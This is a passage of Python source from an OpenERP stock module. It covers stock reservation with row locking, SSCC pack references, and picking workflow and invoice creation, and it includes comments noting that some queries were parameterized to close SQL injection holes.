                                AND ((state = 'done' AND m.location_dest_id = l.id)
                                    OR (state in ('done','assigned') AND m.location_id = l.id)))
                       """, (tuple(locations_ids), product_id,))
            locations_ids = [i for (i,) in cr.fetchall()]
        for id in locations_ids:
            if lock:
                try:
                    # Must lock with a separate select query because FOR UPDATE can't be used with
                    # aggregation/group by's (when individual rows aren't identifiable).
                    # We use a SAVEPOINT to be able to rollback this part of the transaction without
                    # failing the whole transaction in case the LOCK cannot be acquired.
                    cr.execute("SAVEPOINT stock_location_product_reserve")
                    cr.execute("""SELECT id FROM stock_move
                                  WHERE product_id=%s AND
                                          (
                                            (location_dest_id=%s AND
                                             location_id<>%s AND
                                             state='done')
                                            OR
                                            (location_id=%s AND
                                             location_dest_id<>%s AND
                                             state in ('done', 'assigned'))
                                          )
                                  FOR UPDATE of stock_move NOWAIT""", (product_id, id, id, id, id), log_exceptions=False)
                except Exception:
                    # Here it's likely that the FOR UPDATE NOWAIT failed to get the LOCK,
                    # so we ROLLBACK to the SAVEPOINT to restore the transaction to its earlier
                    # state, we return False as if the products were not available, and log it:
                    cr.execute("ROLLBACK TO stock_location_product_reserve")
                    _logger.warning("Failed attempt to reserve %s x product %s, likely due to another transaction already in progress. Next attempt is likely to work. Detailed error available at DEBUG level.", product_qty, product_id)
                    _logger.debug("Trace of the failed product reservation attempt: ", exc_info=True)
                    return False

            # XXX TODO: rewrite this with one single query, possibly even the quantity conversion
            # incoming quantities per uom (moves done into this location)
            cr.execute("""SELECT product_uom, sum(product_qty) AS product_qty
                          FROM stock_move
                          WHERE location_dest_id=%s AND
                                location_id<>%s AND
                                product_id=%s AND
                                state='done'
                          GROUP BY product_uom
                       """,
                       (id, id, product_id))
            results = cr.dictfetchall()
            # outgoing quantities per uom, as negative amounts
            # (done AND assigned, so already-reserved stock is excluded)
            cr.execute("""SELECT product_uom,-sum(product_qty) AS product_qty
                          FROM stock_move
                          WHERE location_id=%s AND
                                location_dest_id<>%s AND
                                product_id=%s AND
                                state in ('done', 'assigned')
                          GROUP BY product_uom
                       """,
                       (id, id, product_id))
            results += cr.dictfetchall()
            total = 0.0
            results2 = 0.0
            # convert every per-uom balance into the reference uom and sum
            # NOTE(review): total and results2 accumulate the same value here
            for r in results:
                amount = uom_obj._compute_qty(cr, uid, r['product_uom'], r['product_qty'], context.get('uom', False))
                results2 += amount
                total += amount
            if total <= 0.0:
                continue

            amount = results2
            compare_qty = float_compare(amount, 0, precision_rounding=uom_rounding)
            if compare_qty == 1:
                # take at most what is available and still needed here
                if amount > min(total, product_qty):
                    amount = min(product_qty, total)
                result.append((amount, id))
                product_qty -= amount
                total -= amount
                if product_qty <= 0.0:
                    # fully reserved: return the (qty, location) breakdown
                    return result
                if total <= 0.0:
                    continue
        # not enough stock found: any partial reservation is discarded
        return False

stock_location()


class stock_tracking(osv.osv):
    """Logistical pack (tracking) records, referenced by stock moves."""
    _name = "stock.tracking"
    _description = "Packs"

    def checksum(sscc):
        """Compute the check digit for an SSCC digit string."""
        # alternating weights 3,1,3,1,... as used by the GS1/SSCC scheme
        salt = '31' * 8 + '3'
        sum = 0
        for sscc_part, salt_part in zip(sscc, salt):
            sum += int(sscc_part) * int(salt_part)
        return (10 - (sum % 10)) % 10
    checksum = staticmethod(checksum)

    def make_sscc(self, cr, uid, context=None):
        """Build the next pack reference: sequence number + check digit."""
        sequence = self.pool.get('ir.sequence').get(cr, uid, 'stock.lot.tracking')
        try:
            return sequence + str(self.checksum(sequence))
        except Exception:
            # e.g. no sequence configured (sequence is falsy/non-numeric):
            # fall back to the raw sequence value
            return sequence

    _columns = {
        'name': fields.char('Pack Reference', size=64, required=True, select=True, help="By default, the pack reference is generated following the sscc standard. (Serial number + 1 check digit)"),
        'active': fields.boolean('Active', help="By unchecking the active field, you may hide a pack without deleting it."),
        'serial': fields.char('Additional Reference', size=64, select=True, help="Other reference or serial number"),
        'move_ids': fields.one2many('stock.move', 'tracking_id', 'Moves for this pack', readonly=True),
        'date': fields.datetime('Creation Date', required=True),
    }
    _defaults = {
        'active': 1,
        # default reference generated from the 'stock.lot.tracking' sequence
        'name': make_sscc,
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
    }

    def name_search(self, cr, user, name, args=None, operator='ilike', context=None, limit=100):
        """Match on the exact serial first, then on the name with ``operator``."""
        if not args:
            args = []
        ids = self.search(cr, user, [('serial', '=', name)]+ args, limit=limit, context=context)
        ids += self.search(cr, user, [('name', operator, name)]+ args, limit=limit, context=context)
        return self.name_get(cr, user, ids, context)

    def name_get(self, cr, uid, ids, context=None):
        """Append the serial to the name"""
        if not len(ids):
            return []
        # display as "name [serial]" when a serial is set
        res = [ (r['id'], r['serial'] and '%s [%s]' % (r['name'], r['serial'])
                                      or r['name'] )
                for r in self.read(cr, uid, ids, ['name', 'serial'],
                                   context=context) ]
        return res

    def unlink(self, cr, uid, ids, context=None):
        # packs are never deleted; always refuse
        raise osv.except_osv(_('Error!'), _('You cannot remove a lot line.'))

    def action_traceability(self, cr, uid, ids, context=None):
        """ It traces the information of a product
        @param self: The object pointer.
        @param cr: A database cursor
        @param uid: ID of the user currently logged in
        @param ids: List of IDs selected
        @param context: A standard dictionary
        @return: A dictionary of values
        """
        return self.pool.get('action.traceability').action_traceability(cr,uid,ids,context)

# old-style OpenERP model registration
stock_tracking()

#----------------------------------------------------------
# Stock Picking
#----------------------------------------------------------
class stock_picking(osv.osv):
    # Picking (shipment) model; inherits mail.thread for messaging/tracking support.
    _name = "stock.picking"
    _inherit = ['mail.thread']
    _description = "Picking List"
    _order = "id desc"  # newest pickings first

    def _set_maximum_date(self, cr, uid, ids, name, value, arg, context=None):
        """ Inverse of the 'max_date' function field.

        Rewrites date_expected on the picking's moves to ``value``; when the
        picking already has a max_date, only the moves currently at that
        maximum are updated.
        @param name: Name of the field being written
        @param value: New datetime value (string); no-op when falsy
        @param arg: User defined argument (unused)
        @return: True, or False when no value is given
        """
        if not value:
            return False
        if isinstance(ids, (int, long)):
            ids = [ids]
        for pick in self.browse(cr, uid, ids, context=context):
            # Pass values as query parameters instead of interpolating them
            # into the SQL string: the original %-formatting / concatenation
            # was vulnerable to SQL injection via 'value' or pick.max_date.
            query = "update stock_move set date_expected=%s where picking_id=%s"
            params = [value, pick.id]
            if pick.max_date:
                query += " and date_expected=%s"
                params.append(pick.max_date)
            cr.execute(query, tuple(params))
        return True

    def _set_minimum_date(self, cr, uid, ids, name, value, arg, context=None):
        """ Inverse of the 'min_date' function field.

        Rewrites date_expected on the picking's moves to ``value``; when the
        picking already has a min_date, only the moves currently at that
        minimum are updated.
        @param name: Name of the field being written
        @param value: New datetime value (string); no-op when falsy
        @param arg: User defined argument (unused)
        @return: True, or False when no value is given
        """
        if not value:
            return False
        if isinstance(ids, (int, long)):
            ids = [ids]
        for pick in self.browse(cr, uid, ids, context=context):
            # Parameterized query: the original string interpolation and
            # concatenation of pick.min_date was SQL-injection-prone.
            query = "update stock_move set date_expected=%s where picking_id=%s"
            params = [value, pick.id]
            if pick.min_date:
                query += " and date_expected=%s"
                params.append(pick.min_date)
            cr.execute(query, tuple(params))
        return True

    def get_min_max_date(self, cr, uid, ids, field_name, arg, context=None):
        """Compute the earliest and latest expected dates over each picking's moves.

        @return: {picking_id: {'min_date': ..., 'max_date': ...}}
        """
        result = dict((picking_id, {'min_date': False, 'max_date': False}) for picking_id in ids)
        if not ids:
            return result
        cr.execute(
            "select picking_id, min(date_expected), max(date_expected) "
            "from stock_move where picking_id IN %s group by picking_id",
            (tuple(ids),))
        for picking_id, earliest, latest in cr.fetchall():
            result[picking_id]['min_date'] = earliest
            result[picking_id]['max_date'] = latest
        return result

    def create(self, cr, user, vals, context=None):
        """Create a picking, generating its reference from the model's sequence
        when none (or the '/' placeholder) is supplied."""
        if vals.get('name', '/') == '/':
            vals['name'] = self.pool.get('ir.sequence').get(cr, user, self._name)
        return super(stock_picking, self).create(cr, user, vals, context)

    # Field definitions. Most fields become read-only once the picking is in the
    # 'done' or 'cancel' state (see the repeated 'states' attribute).
    _columns = {
        'name': fields.char('Reference', size=64, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'origin': fields.char('Source Document', size=64, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Reference of the document", select=True),
        'backorder_id': fields.many2one('stock.picking', 'Back Order of', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True),
        'type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', required=True, select=True, help="Shipping type specify, goods coming in or going out."),
        'note': fields.text('Notes', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'stock_journal_id': fields.many2one('stock.journal','Stock Journal', select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'location_id': fields.many2one('stock.location', 'Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Keep empty if you produce at the location where the finished products are needed." \
                "Set a location if you produce at a fixed location. This can be a partner location " \
                "if you subcontract the manufacturing operations.", select=True),
        'location_dest_id': fields.many2one('stock.location', 'Dest. Location', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="Location where the system will stock the finished products.", select=True),
        'move_type': fields.selection([('direct', 'Partial'), ('one', 'All at once')], 'Delivery Method', required=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}, help="It specifies goods to be deliver partially or all at once"),
        'state': fields.selection([
            ('draft', 'Draft'),
            ('cancel', 'Cancelled'),
            ('auto', 'Waiting Another Operation'),
            ('confirmed', 'Waiting Availability'),
            ('assigned', 'Ready to Transfer'),
            ('done', 'Transferred'),
            ], 'Status', readonly=True, select=True, track_visibility='onchange', help="""
            * Draft: not confirmed yet and will not be scheduled until confirmed\n
            * Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
            * Waiting Availability: still waiting for the availability of products\n
            * Ready to Transfer: products reserved, simply waiting for confirmation.\n
            * Transferred: has been processed, can't be modified or cancelled anymore\n
            * Cancelled: has been cancelled, can't be confirmed anymore"""
        ),
        # min_date/max_date are function fields computed by get_min_max_date and
        # written back through _set_minimum_date/_set_maximum_date (see above).
        'min_date': fields.function(get_min_max_date, fnct_inv=_set_minimum_date, multi="min_max_date",
                 store=True, type='datetime', string='Scheduled Time', select=1, help="Scheduled time for the shipment to be processed"),
        'date': fields.datetime('Creation Date', help="Creation date, usually the time of the order.", select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'date_done': fields.datetime('Date of Transfer', help="Date of Completion", states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'max_date': fields.function(get_min_max_date, fnct_inv=_set_maximum_date, multi="min_max_date",
                 store=True, type='datetime', string='Max. Expected Date', select=2),
        'move_lines': fields.one2many('stock.move', 'picking_id', 'Internal Moves', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}),
        'product_id': fields.related('move_lines', 'product_id', type='many2one', relation='product.product', string='Product'),
        'auto_picking': fields.boolean('Auto-Picking', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'partner_id': fields.many2one('res.partner', 'Partner', states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
        'invoice_state': fields.selection([
            ("invoiced", "Invoiced"),
            ("2binvoiced", "To Be Invoiced"),
            ("none", "Not Applicable")], "Invoice Control",
            select=True, required=True, readonly=True, track_visibility='onchange', states={'draft': [('readonly', False)]}),
        'company_id': fields.many2one('res.company', 'Company', required=True, select=True, states={'done':[('readonly', True)], 'cancel':[('readonly',True)]}),
    }
    # Defaults for new pickings; 'name' starts as the '/' placeholder and is
    # replaced by a sequence number in create() above.
    _defaults = {
        'name': lambda self, cr, uid, context: '/',
        'state': 'draft',
        'move_type': 'direct',
        'type': 'internal',
        'invoice_state': 'none',
        'date': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.picking', context=c)
    }
    # The reference must be unique within a company (not globally).
    _sql_constraints = [
        ('name_uniq', 'unique(name, company_id)', 'Reference must be unique per Company!'),
    ]

    def action_process(self, cr, uid, ids, context=None):
        """Open the partial picking wizard on the selected pickings.

        @param ids: picking ids the wizard should act on
        @return: an ir.actions.act_window dict targeting stock.partial.picking
        """
        # Work on a copy: the original updated the caller's context dict in
        # place, leaking the active_* keys back to the caller.
        context = dict(context or {})
        context.update({
            'active_model': self._name,
            'active_ids': ids,
            'active_id': len(ids) and ids[0] or False
        })
        return {
            'view_type': 'form',
            'view_mode': 'form',
            'res_model': 'stock.partial.picking',
            'type': 'ir.actions.act_window',
            'target': 'new',
            'context': context,
            'nodestroy': True,
        }

    def copy(self, cr, uid, id, default=None, context=None):
        """Duplicate a picking.

        A fresh sequence reference is generated (unless the caller supplied one
        and the source picking has a real name); origin/backorder links are
        cleared, already-invoiced pickings become to-invoice again, and the
        copied moves lose their lot, tracking and history data.
        """
        default = dict(default or {})
        source = self.browse(cr, uid, id, context=context)
        move_obj = self.pool.get('stock.move')
        if 'name' not in default or source.name == '/':
            default['name'] = self.pool.get('ir.sequence').get(cr, uid, 'stock.picking.' + source.type)
            default['origin'] = ''
            default['backorder_id'] = False
        if 'invoice_state' not in default and source.invoice_state == 'invoiced':
            default['invoice_state'] = '2binvoiced'
        new_id = super(stock_picking, self).copy(cr, uid, id, default, context)
        if new_id:
            for move in self.browse(cr, uid, new_id, context=context).move_lines:
                move_obj.write(cr, uid, [move.id], {'tracking_id': False, 'prodlot_id': False, 'move_history_ids2': [(6, 0, [])], 'move_history_ids': [(6, 0, [])]})
        return new_id

    def fields_view_get(self, cr, uid, view_id=None, view_type=False, context=None, toolbar=False, submenu=False):
        """Route form views of the in/out proxy models to their dedicated views."""
        if view_type == 'form' and not view_id:
            form_by_model = {
                "stock.picking.in": 'view_picking_in_form',
                "stock.picking.out": 'view_picking_out_form',
            }
            xml_id = form_by_model.get(self._name)
            if xml_id:
                model, view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'stock', xml_id)
        return super(stock_picking, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar, submenu=submenu)

    def onchange_partner_in(self, cr, uid, ids, partner_id=None, context=None):
        """Hook for modules reacting to partner changes on incoming pickings;
        the base implementation changes nothing."""
        return {}

    def action_explode(self, cr, uid, moves, context=None):
        """Extension point allowing other modules to split a picking's moves.
        The base implementation returns them unchanged."""
        return moves

    def action_confirm(self, cr, uid, ids, context=None):
        """Confirm the pickings and their draft moves.

        Draft moves are first passed through action_explode() (other modules
        may split them), then confirmed.
        @return: True
        """
        pickings = self.browse(cr, uid, ids, context=context)
        self.write(cr, uid, ids, {'state': 'confirmed'})
        draft_move_ids = []
        for picking in pickings:
            draft_move_ids.extend(move.id for move in picking.move_lines if move.state == 'draft')
        draft_move_ids = self.action_explode(cr, uid, draft_move_ids, context)
        if len(draft_move_ids):
            self.pool.get('stock.move').action_confirm(cr, uid, draft_move_ids, context=context)
        return True

    def test_auto_picking(self, cr, uid, ids):
        """Workflow condition for the auto-picking transition; always allowed here."""
        # TODO: Check locations to see if in the same location ?
        return True

    def action_assign(self, cr, uid, ids, *args):
        """Reserve the confirmed moves of each picking.

        Draft pickings are confirmed first through the workflow.
        @raise osv.except_osv: when a picking has no confirmed move to reserve
        @return: True
        """
        workflow = netsvc.LocalService("workflow")
        move_obj = self.pool.get('stock.move')
        for picking in self.browse(cr, uid, ids):
            if picking.state == 'draft':
                workflow.trg_validate(uid, 'stock.picking', picking.id, 'button_confirm', cr)
            confirmed_ids = [move.id for move in picking.move_lines if move.state == 'confirmed']
            if not confirmed_ids:
                raise osv.except_osv(_('Warning!'),_('Not enough stock, unable to reserve the products.'))
            move_obj.action_assign(cr, uid, confirmed_ids)
        return True

    def force_assign(self, cr, uid, ids, *args):
        """Force availability of each picking's confirmed/waiting moves, then
        re-evaluate the picking's workflow.
        @return: True
        """
        workflow = netsvc.LocalService("workflow")
        move_obj = self.pool.get('stock.move')
        for picking in self.browse(cr, uid, ids):
            pending_ids = [move.id for move in picking.move_lines if move.state in ('confirmed', 'waiting')]
            move_obj.force_assign(cr, uid, pending_ids)
            workflow.trg_write(uid, 'stock.picking', picking.id, cr)
        return True

    def draft_force_assign(self, cr, uid, ids, *args):
        """Fire the confirm workflow signal on the pickings from draft state.
        @raise osv.except_osv: when a picking has no move lines
        @return: True
        """
        workflow = netsvc.LocalService("workflow")
        for picking in self.browse(cr, uid, ids):
            if not picking.move_lines:
                raise osv.except_osv(_('Error!'),_('You cannot process picking without stock moves.'))
            workflow.trg_validate(uid, 'stock.picking', picking.id, 'button_confirm', cr)
        return True

    def draft_validate(self, cr, uid, ids, context=None):
        """Validate pickings straight from draft: confirm, force-assign every
        move, then open the partial-processing wizard.
        @return: the wizard action returned by action_process()
        """
        workflow = netsvc.LocalService("workflow")
        move_obj = self.pool.get('stock.move')
        self.draft_force_assign(cr, uid, ids)
        for picking in self.browse(cr, uid, ids, context=context):
            move_obj.force_assign(cr, uid, [move.id for move in picking.move_lines])
            workflow.trg_write(uid, 'stock.picking', picking.id, cr)
        return self.action_process(cr, uid, ids, context=context)
    def cancel_assign(self, cr, uid, ids, *args):
        """Release the reservation on every move of the pickings and
        re-evaluate the workflow.
        @return: True
        """
        workflow = netsvc.LocalService("workflow")
        move_obj = self.pool.get('stock.move')
        for picking in self.browse(cr, uid, ids):
            move_obj.cancel_assign(cr, uid, [move.id for move in picking.move_lines])
            workflow.trg_write(uid, 'stock.picking', picking.id, cr)
        return True

    def action_assign_wkf(self, cr, uid, ids, context=None):
        """Workflow action: mark the pickings as ready to transfer.
        @return: True
        """
        self.write(cr, uid, ids, {'state': 'assigned'})
        return True

    def test_finished(self, cr, uid, ids):
        """Workflow test: are all moves of these pickings finished?

        Pending moves with a zero quantity are forced to 'done'; any other
        pending move makes the test fail.
        @return: True or False
        """
        move_obj = self.pool.get('stock.move')
        move_ids = move_obj.search(cr, uid, [('picking_id', 'in', ids)])
        for move in move_obj.browse(cr, uid, move_ids):
            if move.state in ('done', 'cancel'):
                continue
            if move.product_qty != 0.0:
                return False
            move.write({'state': 'done'})
        return True

    def test_assigned(self, cr, uid, ids):
        """Workflow test: can the pickings be considered assigned?
        @return: True or False
        """
        #TOFIX: assignment of move lines should be call before testing assigment otherwise picking never gone in assign state
        all_settled = True
        for picking in self.browse(cr, uid, ids):
            move_type = picking.move_type
            # incomming shipments are always set as available if they aren't chained
            if picking.type == 'in' and all(move.state != 'waiting' for move in picking.move_lines):
                return True
            for move in picking.move_lines:
                if move_type == 'one' and move.state in ('confirmed', 'draft'):
                    return False
                if move_type == 'direct' and move.state == 'assigned' and move.product_qty:
                    return True
                all_settled = all_settled and move.state in ('cancel', 'done', 'assigned')
        return all_settled

    def action_cancel(self, cr, uid, ids, context=None):
        """Cancel the pickings and all their moves; invoice control is reset.
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        for picking in self.browse(cr, uid, ids, context=context):
            move_obj.action_cancel(cr, uid, [move.id for move in picking.move_lines], context)
        self.write(cr, uid, ids, {'state': 'cancel', 'invoice_state': 'none'})
        return True

    #
    # TODO: change and create a move if not parents
    #
    def action_done(self, cr, uid, ids, context=None):
        """Workflow activity "done": stamp the pickings as transferred,
        recording the completion time.
        @return: True
        """
        self.write(cr, uid, ids, {'state': 'done', 'date_done': time.strftime('%Y-%m-%d %H:%M:%S')})
        return True

    def action_move(self, cr, uid, ids, context=None):
        """Workflow activity "move": process each picking's pending moves.

        Normally triggered by the button_done signal (the "Done" button on a
        picking view). Draft moves are confirmed first; every draft/assigned/
        confirmed move is then set to done.
        @return: True
        """
        move_obj = self.pool.get('stock.move')
        for picking in self.browse(cr, uid, ids, context=context):
            pending = []
            for move in picking.move_lines:
                if move.state == 'draft':
                    move_obj.action_confirm(cr, uid, [move.id], context=context)
                    pending.append(move.id)
                elif move.state in ('assigned', 'confirmed'):
                    pending.append(move.id)
            if len(pending):
                move_obj.action_done(cr, uid, pending, context=context)
        return True

    def get_currency_id(self, cr, uid, picking):
        """Currency override hook for invoicing; False means no override here."""
        return False

    def _get_partner_to_invoice(self, cr, uid, picking, context=None):
        """ Gets the partner that will be invoiced
            Note that this function is inherited in the sale and purchase modules
            @param picking: object of the picking for which we are selecting the partner to invoice
            @return: id of the picking's partner, or its falsy value when unset
        """
        if picking.partner_id:
            return picking.partner_id.id
        return picking.partner_id

    def _get_comment_invoice(self, cr, uid, picking):
        """Return the picking note to use as invoice comment ('' when unset)."""
        if picking.note:
            return picking.note
        return ''

    def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):
        """ Gets price unit for invoice

        Supplier invoices/refunds use the product cost price expressed in the
        company currency; customer documents use the sale list price.
        @param move_line: Stock move line being invoiced
        @param type: Type of invoice ('in_invoice', 'in_refund', ...)
        @return: The price unit for the move line
        """
        # Copy before adding keys: the original mutated the caller's context
        # dict in place, leaking 'currency_id' back to the caller.
        context = dict(context or {})

        if type in ('in_invoice', 'in_refund'):
            # Take the user company and pricetype
            context['currency_id'] = move_line.company_id.currency_id.id
            amount_unit = move_line.product_id.price_get('standard_price', context=context)[move_line.product_id.id]
            return amount_unit
        else:
            return move_line.product_id.list_price

    def _get_discount_invoice(self, cr, uid, move_line):
        """Discount applied to the invoice line for this move; none by default."""
        return 0.0

    def _get_taxes_invoice(self, cr, uid, move_line, type):
        """ Taxes to apply on the invoice line for ``move_line``.

        Supplier taxes for incoming invoices/refunds, customer taxes otherwise,
        mapped through the partner's fiscal position when one is set.
        @param type: Type of invoice
        @return: Tax ids for the move line
        """
        product = move_line.product_id
        if type in ('in_invoice', 'in_refund'):
            taxes = product.supplier_taxes_id
        else:
            taxes = product.taxes_id

        picking = move_line.picking_id
        if picking and picking.partner_id and picking.partner_id.id:
            fiscal_position = picking.partner_id.property_account_position
            return self.pool.get('account.fiscal.position').map_tax(cr, uid, fiscal_position, taxes)
        return [tax.id for tax in taxes]

    def _get_account_analytic_invoice(self, cr, uid, picking, move_line):
        """Analytic account hook for invoice lines; none by default."""
        return False

    def _invoice_line_hook(self, cr, uid, move_line, invoice_line_id):
        """Post-processing hook called after each invoice line is created;
        the base implementation does nothing."""
        return

    def _invoice_hook(self, cr, uid, picking, invoice_id):
        """Post-processing hook called after each invoice is created;
        the base implementation does nothing."""
        return

    def _get_invoice_type(self, pick):
        """Deduce the invoice type for a to-be-invoiced picking.

        Decision is based on the picking direction and the usage of the first
        move's source/destination location.
        @return: 'out_invoice', 'out_refund', 'in_invoice', 'in_refund',
                 or None when the picking is not to be invoiced
        """
        if pick.invoice_state != '2binvoiced':
            return None
        src_usage = dest_usage = None
        if pick.move_lines:
            first_move = pick.move_lines[0]
            src_usage = first_move.location_id.usage
            dest_usage = first_move.location_dest_id.usage
        if pick.type == 'out':
            return 'in_refund' if dest_usage == 'supplier' else 'out_invoice'
        if pick.type == 'in':
            if src_usage == 'supplier':
                return 'in_invoice'
            if src_usage == 'customer':
                return 'out_refund'
        return 'out_invoice'

    def _prepare_invoice_group(self, cr, uid, picking, partner, invoice, context=None):
        """ Builds the dict for grouped invoices
            @param picking: picking object
            @param partner: object of the partner to invoice (not used here, but may be usefull if this function is inherited)
            @param invoice: object of the invoice that we are updating
            @return: dict that will be used to update the invoice
        """
        if context is None:
            # Guard: context defaults to None but context.get() is used below,
            # which crashed when the caller passed no context.
            context = {}
        comment = self._get_comment_invoice(cr, uid, picking)
        return {
            'name': (invoice.name or '') + ', ' + (picking.name or ''),
            'origin': (invoice.origin or '') + ', ' + (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
            'comment': (comment and (invoice.comment and invoice.comment + "\n" + comment or comment)) or (invoice.comment and invoice.comment or ''),
            'date_invoice': context.get('date_inv', False),
            'user_id': uid,
        }

    def _prepare_invoice(self, cr, uid, picking, partner, inv_type, journal_id, context=None):
        """ Builds the dict containing the values for the invoice
            @param picking: picking object
            @param partner: object of the partner to invoice
            @param inv_type: type of the invoice ('out_invoice', 'in_invoice', ...)
            @param journal_id: ID of the accounting journal
            @return: dict that will be used to create the invoice object
        """
        if context is None:
            # Guard: context.get('date_inv') below crashed with the default None.
            context = {}
        if isinstance(partner, (int, long)):
            # Accept both Python 2 integer types: record ids may be longs,
            # as acknowledged elsewhere in this model (isinstance(ids, (int, long))).
            partner = self.pool.get('res.partner').browse(cr, uid, partner, context=context)
        if inv_type in ('out_invoice', 'out_refund'):
            # Customer documents: receivable account and customer payment term.
            account_id = partner.property_account_receivable.id
            payment_term = partner.property_payment_term.id or False
        else:
            # Supplier documents: payable account and supplier payment term.
            account_id = partner.property_account_payable.id
            payment_term = partner.property_supplier_payment_term.id or False
        comment = self._get_comment_invoice(cr, uid, picking)
        invoice_vals = {
            'name': picking.name,
            'origin': (picking.name or '') + (picking.origin and (':' + picking.origin) or ''),
            'type': inv_type,
            'account_id': account_id,
            'partner_id': partner.id,
            'comment': comment,
            'payment_term': payment_term,
            'fiscal_position': partner.property_account_position.id,
            'date_invoice': context.get('date_inv', False),
            'company_id': picking.company_id.id,
            'user_id': uid,
        }
        # Optional overrides: currency hook and explicit journal.
        cur_id = self.get_currency_id(cr, uid, picking)
        if cur_id:
            invoice_vals['currency_id'] = cur_id
        if journal_id:
            invoice_vals['journal_id'] = journal_id
        return invoice_vals

    def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id,
        invoice_vals, context=None):
        """ Builds the dict containing the values for one invoice line
            @param group: True when lines of several pickings share one invoice
            @param picking: picking object
            @param move_line: stock move being invoiced
            @param invoice_id: ID of the related invoice
            @param invoice_vals: dict used to create the invoice
            @return: dict that will be used to create the invoice line
        """
        name = move_line.name
        if group:
            name = (picking.name or '') + '-' + name
        origin = move_line.picking_id.name or ''
        if move_line.picking_id.origin:
            origin = origin + ':' + move_line.picking_id.origin

        product = move_line.product_id
        # Income account for customer documents, expense account otherwise,
        # falling back to the product category's account.
        if invoice_vals['type'] in ('out_invoice', 'out_refund'):
            account_id = product.property_account_income.id or \
                    product.categ_id.property_account_income_categ.id
        else:
            account_id = product.property_account_expense.id or \
                    product.categ_id.property_account_expense_categ.id
        if invoice_vals['fiscal_position']:
            fp_obj = self.pool.get('account.fiscal.position')
            fiscal_position = fp_obj.browse(cr, uid, invoice_vals['fiscal_position'], context=context)
            account_id = fp_obj.map_account(cr, uid, fiscal_position, account_id)
        # set UoS if it's a sale and the picking doesn't have one
        uos_id = move_line.product_uos and move_line.product_uos.id or False
        if not uos_id and invoice_vals['type'] in ('out_invoice', 'out_refund'):
            uos_id = move_line.product_uom.id

        return {
            'name': name,
            'origin': origin,
            'invoice_id': invoice_id,
            'uos_id': uos_id,
            'product_id': product.id,
            'account_id': account_id,
            'price_unit': self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type']),
            'discount': self._get_discount_invoice(cr, uid, move_line),
            'quantity': move_line.product_uos_qty or move_line.product_qty,
            'invoice_line_tax_id': [(6, 0, self._get_taxes_invoice(cr, uid, move_line, invoice_vals['type']))],
            'account_analytic_id': self._get_account_analytic_invoice(cr, uid, picking, move_line),
        }

    def action_invoice_create(self, cr, uid, ids, journal_id=False,
            group=False, type='out_invoice', context=None):
        """ Creates invoice based on the invoice state selected for picking.
        @param journal_id: Id of journal
        @param group: Whether to create a group invoice or not
        @param type: Type invoice to be created
        @return: Ids of created invoices for the pickings
        """
        if context is None:
            context = {}

        invoice_obj = self.pool.get('account.invoice')
        invoice_line_obj = self.pool.get('account.invoice.line')
        partner_obj = self.pool.get('res.partner')
        # invoices_group maps partner id -> invoice id, so several pickings of
        # the same partner can share one invoice when group=True.
        invoices_group = {}
        res = {}
        inv_type = type
        for picking in self.browse(cr, uid, ids, context=context):
            # Only pickings flagged "To Be Invoiced" are processed.
            if picking.invoice_state != '2binvoiced':
                continue
            partner = self._get_partner_to_invoice(cr, uid, picking, context=context)
            if isinstance(partner, int):
                partner = partner_obj.browse(cr, uid, [partner], context=context)[0]
            if not partner:
                raise osv.except_osv(_('Error, no partner!'),
                    _('Please put a partner on the picking list if you want to generate invoice.'))

            if not inv_type:
                inv_type = self._get_invoice_type(picking)

            if group and partner.id in invoices_group:
                # Reuse the partner's existing invoice and merge header values.
                invoice_id = invoices_group[partner.id]
                invoice = invoice_obj.browse(cr, uid, invoice_id)
                invoice_vals_group = self._prepare_invoice_group(cr, uid, picking, partner, invoice, context=context)
                invoice_obj.write(cr, uid, [invoice_id], invoice_vals_group, context=context)
            else:
                invoice_vals = self._prepare_invoice(cr, uid, picking, partner, inv_type, journal_id, context=context)
                invoice_id = invoice_obj.create(cr, uid, invoice_vals, context=context)
                invoices_group[partner.id] = invoice_id
            res[picking.id] = invoice_id
            for move_line in picking.move_lines:
                if move_line.state == 'cancel':
                    continue
                if move_line.scrapped:
                    # do no invoice scrapped products
                    continue
                # NOTE(review): in the grouped branch above, invoice_vals is the
                # dict built for an EARLIER picking of the same partner (it is
                # not rebuilt when reusing an invoice) — verify this is intended.
                vals = self._prepare_invoice_line(cr, uid, group, picking, move_line,
                                invoice_id, invoice_vals, context=context)
                if vals:
                    invoice_line_id = invoice_line_obj.create(cr, uid, vals, context=context)
                    self._invoice_line_hook(cr, uid, move_line, invoice_line_id)

            invoice_obj.button_compute(cr, uid, [invoice_id], context=context,
                    set_total=(inv_type in ('in_invoice', 'in_refund')))
            self.write(cr, uid, [picking.id], {
                'invoice_state': 'invoiced',
                }, context=context)
            self._invoice_hook(cr, uid, picking, invoice_id)
        # NOTE(review): this final write repeats the per-picking write above for
        # the same ids; it looks redundant but is kept as-is.
        self.write(cr, uid, res.keys(), {
